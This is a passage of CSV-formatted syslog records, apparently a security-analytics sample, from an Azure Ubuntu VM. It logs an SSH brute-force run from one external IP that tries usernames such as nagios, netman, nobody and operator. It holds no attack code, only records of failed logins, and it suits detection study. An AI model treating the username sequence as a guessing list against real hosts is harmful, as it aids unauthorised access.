+2863,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:22:24,UbuntuDevEnv,2019-06-28 05:22:23,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,94783,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2864,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:22:26,UbuntuDevEnv,2019-06-28 05:22:25,auth,UbuntuDevEnv,info,Failed password for invalid user nagios from 193.201.224.232 port 18203 ssh2,94783,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nagios,193.201.224.2,18203,,
+2865,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:22:27,UbuntuDevEnv,2019-06-28 05:22:27,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,94783,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2866,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:22:29,UbuntuDevEnv,2019-06-28 05:22:29,auth,UbuntuDevEnv,info,Failed password for invalid user nagios from 193.201.224.232 port 18203 ssh2,94783,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nagios,193.201.224.2,18203,,
+2867,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:22:32,UbuntuDevEnv,2019-06-28 05:22:31,authpriv,UbuntuDevEnv,notice,PAM 2 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,94783,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2868,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:22:32,UbuntuDevEnv,2019-06-28 05:22:31,auth,UbuntuDevEnv,info,"Disconnecting invalid user nagios 193.201.224.232 port 18203: Change of username or service not allowed: (nagios,ssh-connection) -> (NAU,ssh-connection) [preauth]",94783,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nagios,193.201.224.2,18203,,
+2869,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:22:33,UbuntuDevEnv,2019-06-28 05:22:32,auth,UbuntuDevEnv,info,Invalid user NAU from 193.201.224.232 port 56484,94835,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,NAU,193.201.224.2,56484,,
+2870,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:22:33,UbuntuDevEnv,2019-06-28 05:22:32,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,94835,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2871,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:22:33,UbuntuDevEnv,2019-06-28 05:22:32,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,94835,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2872,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:22:35,UbuntuDevEnv,2019-06-28 05:22:34,auth,UbuntuDevEnv,info,Failed password for invalid user NAU from 193.201.224.232 port 56484 ssh2,94835,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,NAU,193.201.224.2,56484,,
+2873,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:22:35,UbuntuDevEnv,2019-06-28 05:22:34,auth,UbuntuDevEnv,info,"Disconnecting invalid user NAU 193.201.224.232 port 56484: Change of username or service not allowed: (NAU,ssh-connection) -> (netman,ssh-connection) [preauth]",94835,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,NAU,193.201.224.2,56484,,
+2874,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:22:35,UbuntuDevEnv,2019-06-28 05:22:35,auth,UbuntuDevEnv,info,Invalid user netman from 193.201.224.232 port 60101,94847,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,netman,193.201.224.2,60101,,
+2875,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:22:35,UbuntuDevEnv,2019-06-28 05:22:35,auth,UbuntuDevEnv,info,Failed none for invalid user netman from 193.201.224.232 port 60101 ssh2,94847,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,netman,193.201.224.2,60101,,
+2876,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:22:36,UbuntuDevEnv,2019-06-28 05:22:35,auth,UbuntuDevEnv,info,"Disconnecting invalid user netman 193.201.224.232 port 60101: Change of username or service not allowed: (netman,ssh-connection) -> (nobody,ssh-connection) [preauth]",94847,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,netman,193.201.224.2,60101,,
+2877,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:22:36,UbuntuDevEnv,2019-06-28 05:22:36,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232  user=nobody,94856,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nobody,193.201.224.2,,0,
+2878,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:22:38,UbuntuDevEnv,2019-06-28 05:22:38,auth,UbuntuDevEnv,info,Failed password for nobody from 193.201.224.232 port 60886 ssh2,94856,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,60886,,
+2879,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:22:45,UbuntuDevEnv,2019-06-28 05:22:44,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  4 > 3,94856,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+2880,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:22:45,UbuntuDevEnv,2019-06-28 05:22:44,auth,UbuntuDevEnv,info,message repeated 3 times: [ Failed password for nobody from 193.201.224.232 port 60886 ssh2],94856,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,60886,,
+2881,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:22:45,UbuntuDevEnv,2019-06-28 05:22:44,auth,UbuntuDevEnv,info,"Disconnecting authenticating user nobody 193.201.224.232 port 60886: Change of username or service not allowed: (nobody,ssh-connection) -> (nt,ssh-connection) [preauth]",94856,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,nobody,193.201.224.2,60886,,
+2882,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:22:45,UbuntuDevEnv,2019-06-28 05:22:44,authpriv,UbuntuDevEnv,notice,PAM 3 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232  user=nobody,94856,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nobody,193.201.224.2,,0,
+2883,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:22:47,UbuntuDevEnv,2019-06-28 05:22:47,auth,UbuntuDevEnv,info,Invalid user nt from 193.201.224.232 port 31715,94886,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nt,193.201.224.2,31715,,
+2884,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:22:47,UbuntuDevEnv,2019-06-28 05:22:47,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,94886,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2885,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:22:47,UbuntuDevEnv,2019-06-28 05:22:47,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,94886,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2886,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:22:49,UbuntuDevEnv,2019-06-28 05:22:49,auth,UbuntuDevEnv,info,Failed password for invalid user nt from 193.201.224.232 port 31715 ssh2,94886,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nt,193.201.224.2,31715,,
+2887,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:22:49,UbuntuDevEnv,2019-06-28 05:22:49,auth,UbuntuDevEnv,info,"Disconnecting invalid user nt 193.201.224.232 port 31715: Change of username or service not allowed: (nt,ssh-connection) -> (operator,ssh-connection) [preauth]",94886,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nt,193.201.224.2,31715,,
+2888,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:22:50,UbuntuDevEnv,2019-06-28 05:22:50,auth,UbuntuDevEnv,info,Invalid user operator from 193.201.224.232 port 38093,94901,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,operator,193.201.224.2,38093,,
+2889,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:22:50,UbuntuDevEnv,2019-06-28 05:22:50,auth,UbuntuDevEnv,info,Failed none for invalid user operator from 193.201.224.232 port 38093 ssh2,94901,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,operator,193.201.224.2,38093,,
+2890,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:22:50,UbuntuDevEnv,2019-06-28 05:22:50,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,94901,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2891,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:22:50,UbuntuDevEnv,2019-06-28 05:22:50,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,94901,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2892,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:22:52,UbuntuDevEnv,2019-06-28 05:22:52,auth,UbuntuDevEnv,info,Failed password for invalid user operator from 193.201.224.232 port 38093 ssh2,94901,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,operator,193.201.224.2,38093,,
+2893,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:22:53,UbuntuDevEnv,2019-06-28 05:22:53,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,94901,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2894,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:22:56,UbuntuDevEnv,2019-06-28 05:22:55,auth,UbuntuDevEnv,info,Failed password for invalid user operator from 193.201.224.232 port 38093 ssh2,94901,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,operator,193.201.224.2,38093,,
+2895,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:22:56,UbuntuDevEnv,2019-06-28 05:22:55,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,94901,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2896,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:22:58,UbuntuDevEnv,2019-06-28 05:22:57,auth,UbuntuDevEnv,info,Failed password for invalid user operator from 193.201.224.232 port 38093 ssh2,94901,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,operator,193.201.224.2,38093,,
+2897,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:22:59,UbuntuDevEnv,2019-06-28 05:22:58,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,94901,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2898,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:23:01,UbuntuDevEnv,2019-06-28 05:23:00,auth,UbuntuDevEnv,info,Failed password for invalid user operator from 193.201.224.232 port 38093 ssh2,94901,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,operator,193.201.224.2,38093,,
+2899,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:23:01,UbuntuDevEnv,2019-06-28 05:23:00,authpriv,UbuntuDevEnv,notice,PAM 3 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,94901,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2900,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:23:01,UbuntuDevEnv,2019-06-28 05:23:00,auth,UbuntuDevEnv,info,"Disconnecting invalid user operator 193.201.224.232 port 38093: Change of username or service not allowed: (operator,ssh-connection) -> (Operator,ssh-connection) [preauth]",94901,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,operator,193.201.224.2,38093,,
+2901,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:23:01,UbuntuDevEnv,2019-06-28 05:23:00,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  4 > 3,94901,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+2902,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:23:08,UbuntuDevEnv,2019-06-28 05:23:07,auth,UbuntuDevEnv,info,Invalid user Operator from 193.201.224.232 port 9133,94956,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,Operator,193.201.224.2,9133,,
+2903,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:23:08,UbuntuDevEnv,2019-06-28 05:23:08,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,94956,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2904,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:23:08,UbuntuDevEnv,2019-06-28 05:23:08,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,94956,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2905,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:23:10,UbuntuDevEnv,2019-06-28 05:23:10,auth,UbuntuDevEnv,info,Failed password for invalid user Operator from 193.201.224.232 port 9133 ssh2,94956,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,Operator,193.201.224.2,9133,,
+2906,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:23:11,UbuntuDevEnv,2019-06-28 05:23:10,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,94956,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2907,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:23:13,UbuntuDevEnv,2019-06-28 05:23:13,auth,UbuntuDevEnv,info,Failed password for invalid user Operator from 193.201.224.232 port 9133 ssh2,94956,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,Operator,193.201.224.2,9133,,
+2908,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:23:14,UbuntuDevEnv,2019-06-28 05:23:14,auth,UbuntuDevEnv,info,"Disconnecting invalid user Operator 193.201.224.232 port 9133: Change of username or service not allowed: (Operator,ssh-connection) -> (operator,ssh-connection) [preauth]",94956,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,Operator,193.201.224.2,9133,,
+2909,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:23:14,UbuntuDevEnv,2019-06-28 05:23:14,authpriv,UbuntuDevEnv,notice,PAM 1 more authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,94956,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2910,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:23:15,UbuntuDevEnv,2019-06-28 05:23:15,auth,UbuntuDevEnv,info,Invalid user operator from 193.201.224.232 port 51074,94992,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,operator,193.201.224.2,51074,,
+2911,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:23:15,UbuntuDevEnv,2019-06-28 05:23:15,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,94992,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2912,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:23:15,UbuntuDevEnv,2019-06-28 05:23:15,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,94992,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2913,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:23:17,UbuntuDevEnv,2019-06-28 05:23:17,auth,UbuntuDevEnv,info,Failed password for invalid user operator from 193.201.224.232 port 51074 ssh2,94992,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,operator,193.201.224.2,51074,,
+2914,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:23:18,UbuntuDevEnv,2019-06-28 05:23:17,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,94992,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2915,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:23:20,UbuntuDevEnv,2019-06-28 05:23:19,auth,UbuntuDevEnv,info,Failed password for invalid user operator from 193.201.224.232 port 51074 ssh2,94992,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,operator,193.201.224.2,51074,,
+2916,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:23:20,UbuntuDevEnv,2019-06-28 05:23:19,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,94992,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2917,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:23:22,UbuntuDevEnv,2019-06-28 05:23:22,auth,UbuntuDevEnv,info,Failed password for invalid user operator from 193.201.224.232 port 51074 ssh2,94992,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,operator,193.201.224.2,51074,,
+2918,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:23:23,UbuntuDevEnv,2019-06-28 05:23:23,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,94992,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2919,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:23:26,UbuntuDevEnv,2019-06-28 05:23:25,auth,UbuntuDevEnv,info,Failed password for invalid user operator from 193.201.224.232 port 51074 ssh2,94992,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,operator,193.201.224.2,51074,,
+2920,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:23:26,UbuntuDevEnv,2019-06-28 05:23:25,authpriv,UbuntuDevEnv,notice,PAM 3 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,94992,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2921,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:23:26,UbuntuDevEnv,2019-06-28 05:23:25,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  4 > 3,94992,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
